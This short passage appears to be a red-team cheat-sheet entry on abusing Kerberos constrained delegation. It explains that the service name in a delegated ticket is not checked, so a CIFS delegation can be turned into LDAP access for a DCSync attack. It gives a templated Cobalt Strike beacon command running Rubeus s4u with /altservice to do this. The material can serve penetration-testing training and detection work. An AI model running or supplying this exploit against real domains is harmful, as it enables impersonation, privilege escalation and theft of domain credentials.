Kerberos does not check the service name for constrained delegation (i.e. it only checks what account is running the service), so if a service account is configured for constrained delegation to CIFS, then that service account can technically request a TGS to LDAP on the same target server, since both CIFS and LDAP runs under the same machine account. The ticket to LDAP can then be used to perform a DCSync attack.
To exploit this loophole, add an /altservice:[target-service] when exploiting constrained delegation:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:[target-user] /msdsspn:[allowed-spn] /altservice:[target-service-under-same-account-as-spn] /user:[user-allowed-to-delegate] /ticket:[user-ticket-base64] /nowrap